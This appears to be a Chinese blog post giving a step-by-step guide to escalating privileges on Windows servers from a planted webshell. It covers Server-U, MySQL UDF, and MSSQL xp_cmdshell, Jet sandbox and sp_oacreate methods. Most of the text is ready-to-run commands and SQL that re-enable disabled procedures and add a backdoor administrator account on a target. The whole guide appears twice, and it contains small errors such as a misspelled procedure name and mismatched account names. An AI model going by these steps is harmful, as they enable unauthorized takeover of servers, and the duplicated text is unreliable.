基於webshell提權
阿新 • • 發佈:2018-12-30
1.Server-u提權
Server-u是windows平臺的FTP伺服器軟體,通過使用server-u,使用者能夠將任何一臺PC設定成一個FTP伺服器,這樣,使用者就能夠使用FTP協議進行檔案或目錄的複製,建立和刪除等。
通過webshell讀取server-u配置檔案,修改配置,新增系統使用者(組)
利用webshell讀取伺服器資訊,發現伺服器安裝server-u服務
1.在瀏覽器中輸入http://目標地址/webshell.asp,輸入預設密碼
2.單擊執行--CMD,在右側選上覆選框"wscript.shell", 輸入netstat -an檢視埠
3,利用webshell讀取伺服器資訊,發現伺服器系統安裝server-u服務,預設埠號43958
4.單擊Servu-提權,在命令列中輸入:cmd /c net user aaa 123 /add & net localgroup administrators aaa /add
利用遠端桌面連線server-u伺服器, 輸入mstsc
1.單擊開始-執行-輸入cmd, 在命令列中輸入"mstsc"
2.輸入新新增的賬號aaa, 輸入密碼123,單擊確定
2.Mysql_udf提權
UDF(user-defined function)是MySQL的一個擴充套件介面,也稱為自定義函式
通過webshell讀取網站資料庫配置檔案,獲取資料庫連線使用者名稱和密碼
利用webshell讀取伺服器資訊,發現伺服器系統安裝mssql資料庫,預設埠3306
1.在瀏覽器中輸入http://目標地址/webshell.asp,輸入預設密碼
2.單擊埠掃描-開始掃描,發現3306埠開放,安裝了MySQL資料庫
3.單擊mysql_udf提權,輸入已知的資料庫連線使用者名稱和密碼,單擊連線
4.在可載入路徑中輸入:C:/windows/mysqlDll.dll, 單擊安裝DLL
5.在下拉列表中選擇新增管理員,輸入net user aaa 123 /add, 單擊執行
6.在下拉列表中選擇設為管理組,輸入net localgroup administrators aaa /add, 單擊執行
3.MSsql xp_cmdshell提權
通過webshell取得網站資料庫連線配置檔案,獲取資料庫連線密碼。通過webshell上用xp_cmdshell新增系統賬號
利用webshell讀取伺服器資訊,發現伺服器系統安裝mssql2005資料庫,預設埠1433
1.在瀏覽器中輸入http://目標地址/webshell.asp,輸入預設密碼
2.單擊埠掃描-開始掃描,發現1433埠開放,安裝了MSSQL資料庫
3.單擊資料庫操作,輸入資料庫名稱master和密碼,連結MSSql資料庫
4.輸入:"select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell" 檢視cmd_shell是否開啟
5.新增系統賬號,執行SQL操作命令:exec master.dbo.xp_cndshell 'net user aaa 123 /add'
6.將賬號加入管理員組,執行SQL操作命令:Exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'
xp_cmdshell儲存過程在MSsql2005及以上版本預設是禁用的,輸入SQL操作命令啟用xp_cmdshell
"exec sp_configure show advanced options,1; reconfigure; exec sp_configure xp_cmdshell, 1; reconfigure;"
4.MSsql SandBox沙盒提權
通過webshell取得網站資料庫連線配置檔案,獲取資料庫連線密碼。利用沙盒獲取系統許可權
利用webshell讀取伺服器資訊,發現伺服器系統安裝mssql2005資料庫
1.在瀏覽器中輸入http://目標地址/webshell.asp,輸入預設密碼
2.單擊埠掃描-開始掃描,發現1433埠開放,安裝了MSSQL資料庫
3.單擊資料庫操作,輸入資料庫名稱master和密碼,連結MSSql資料庫。在sql操作命令中輸入:"select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell" 檢視cmd_shell是否開啟
4.利用jet.oledb執行系統命令新增系統賬號
在SQL操作命令輸入:"select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user aaa 123 /add")')"
在SQL操作命令輸入:"select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup administrators aaa /add")')" //將使用者填入管理員組
xp_regwrite儲存過程在Mssql 2005及以上版本預設是禁用的,輸入SQL操作命令啟用xp_regwrite
"exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--"
5.MSsql sp_oacreate提權
通過webshell取得網站資料庫連線配置檔案,獲取資料庫連線密碼。利用sp_oacreate新增系統賬號
利用webshell讀取伺服器資訊,發現伺服器系統安裝mssql2005資料庫
1.在瀏覽器中輸入http://目標地址/webshell.asp,輸入預設密碼
2.單擊埠掃描-開始掃描,發現1433埠開放,安裝了MSSQL資料庫
3.單擊資料庫操作,輸入資料庫名稱master和密碼,連結MSSql資料庫。在sql操作命令中輸入:"select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell" 檢視cmd_shell是否開啟
4.利用sp_oacreate新增系統賬號,並將賬號加入管理員組
在SQL操作命令中輸入:"declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aaa 123 /add' "
在SQL操作命令中輸入:"declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators aaa /add' "
declare @shell int //判斷支援多行語句查詢
3.sp_oacreate儲存過程在Mssql 2005及以上版本預設是禁用的,輸入SQL操作命令啟用sp_oacreate
"exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'Ole Automation Procedures',1;reconfigure;"
6.Mssql自動化任務提權
利用webshell讀取伺服器資訊,發現伺服器系統安裝mssql2005資料庫
1.在瀏覽器中輸入http://目標地址/webshell.asp,輸入預設密碼
2.單擊埠掃描-開始掃描,發現1433埠開放,安裝了MSSQL資料庫
雙擊1433提權器軟體,輸入IP地址,密碼等連線資料庫
在命令中輸入:net user aaa 123 /add //新增使用者
在命令中輸入:net localgroup administrators aaa /add //給使用者賦予管理員許可權
在命令中輸入:netstat -an 檢視伺服器開發的埠
Server-u是windows平臺的FTP伺服器軟體,通過使用server-u,使用者能夠將任何一臺PC設定成一個FTP伺服器,這樣,使用者就能夠使用FTP協議進行檔案或目錄的複製,建立和刪除等。
通過webshell讀取server-u配置檔案,修改配置,新增系統使用者(組)
利用webshell讀取伺服器資訊,發現伺服器安裝server-u服務
1.在瀏覽器中輸入http://目標地址/webshell.asp,輸入預設密碼
2.單擊執行--CMD,在右側選上覆選框"wscript.shell", 輸入netstat -an檢視埠
3,利用webshell讀取伺服器資訊,發現伺服器系統安裝server-u服務,預設埠號43958
4.單擊Servu-提權,在命令列中輸入:cmd /c net user aaa 123 /add & net localgroup administrators aaa /add
利用遠端桌面連線server-u伺服器, 輸入mstsc
1.單擊開始-執行-輸入cmd, 在命令列中輸入"mstsc"
2.輸入新新增的賬號aaa, 輸入密碼123,單擊確定
2.Mysql_udf提權
UDF(user-defined function)是MySQL的一個擴充套件介面,也稱為自定義函式
通過webshell讀取網站資料庫配置檔案,獲取資料庫連線使用者名稱和密碼
利用webshell讀取伺服器資訊,發現伺服器系統安裝mssql資料庫,預設埠3306
1.在瀏覽器中輸入http://目標地址/webshell.asp,輸入預設密碼
2.單擊埠掃描-開始掃描,發現3306埠開放,安裝了MySQL資料庫
3.單擊mysql_udf提權,輸入已知的資料庫連線使用者名稱和密碼,單擊連線
4.在可載入路徑中輸入:C:/windows/mysqlDll.dll, 單擊安裝DLL
5.在下拉列表中選擇新增管理員,輸入net user aaa 123 /add, 單擊執行
6.在下拉列表中選擇設為管理組,輸入net localgroup administrators aaa /add, 單擊執行
3.MSsql xp_cmdshell提權
通過webshell取得網站資料庫連線配置檔案,獲取資料庫連線密碼。通過webshell上用xp_cmdshell新增系統賬號
利用webshell讀取伺服器資訊,發現伺服器系統安裝mssql2005資料庫,預設埠1433
1.在瀏覽器中輸入http://目標地址/webshell.asp,輸入預設密碼
2.單擊埠掃描-開始掃描,發現1433埠開放,安裝了MSSQL資料庫
3.單擊資料庫操作,輸入資料庫名稱master和密碼,連結MSSql資料庫
4.輸入:"select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell" 檢視cmd_shell是否開啟
5.新增系統賬號,執行SQL操作命令:exec master.dbo.xp_cndshell 'net user aaa 123 /add'
6.將賬號加入管理員組,執行SQL操作命令:Exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'
xp_cmdshell儲存過程在MSsql2005及以上版本預設是禁用的,輸入SQL操作命令啟用xp_cmdshell
"exec sp_configure show advanced options,1; reconfigure; exec sp_configure xp_cmdshell, 1; reconfigure;"
4.MSsql SandBox沙盒提權
通過webshell取得網站資料庫連線配置檔案,獲取資料庫連線密碼。利用沙盒獲取系統許可權
利用webshell讀取伺服器資訊,發現伺服器系統安裝mssql2005資料庫
1.在瀏覽器中輸入http://目標地址/webshell.asp,輸入預設密碼
2.單擊埠掃描-開始掃描,發現1433埠開放,安裝了MSSQL資料庫
3.單擊資料庫操作,輸入資料庫名稱master和密碼,連結MSSql資料庫。在sql操作命令中輸入:"select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell" 檢視cmd_shell是否開啟
4.利用jet.oledb執行系統命令新增系統賬號
在SQL操作命令輸入:"select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user aaa 123 /add")')"
在SQL操作命令輸入:"select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup administrators aaa /add")')" //將使用者填入管理員組
xp_regwrite儲存過程在Mssql 2005及以上版本預設是禁用的,輸入SQL操作命令啟用xp_regwrite
"exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--"
5.MSsql sp_oacreate提權
通過webshell取得網站資料庫連線配置檔案,獲取資料庫連線密碼。利用sp_oacreate新增系統賬號
利用webshell讀取伺服器資訊,發現伺服器系統安裝mssql2005資料庫
1.在瀏覽器中輸入http://目標地址/webshell.asp,輸入預設密碼
2.單擊埠掃描-開始掃描,發現1433埠開放,安裝了MSSQL資料庫
3.單擊資料庫操作,輸入資料庫名稱master和密碼,連結MSSql資料庫。在sql操作命令中輸入:"select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell" 檢視cmd_shell是否開啟
4.利用sp_oacreate新增系統賬號,並將賬號加入管理員組
在SQL操作命令中輸入:"declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aaa 123 /add' "
在SQL操作命令中輸入:"declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators aaa /add' "
declare @shell int //判斷支援多行語句查詢
3.sp_oacreate儲存過程在Mssql 2005及以上版本預設是禁用的,輸入SQL操作命令啟用sp_oacreate
"exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'Ole Automation Procedures',1;reconfigure;"
6.Mssql自動化任務提權
利用webshell讀取伺服器資訊,發現伺服器系統安裝mssql2005資料庫
1.在瀏覽器中輸入http://目標地址/webshell.asp,輸入預設密碼
2.單擊埠掃描-開始掃描,發現1433埠開放,安裝了MSSQL資料庫
雙擊1433提權器軟體,輸入IP地址,密碼等連線資料庫
在命令中輸入:net user aaa 123 /add //新增使用者
在命令中輸入:net localgroup administrators aaa /add //給使用者賦予管理員許可權
在命令中輸入:netstat -an 檢視伺服器開發的埠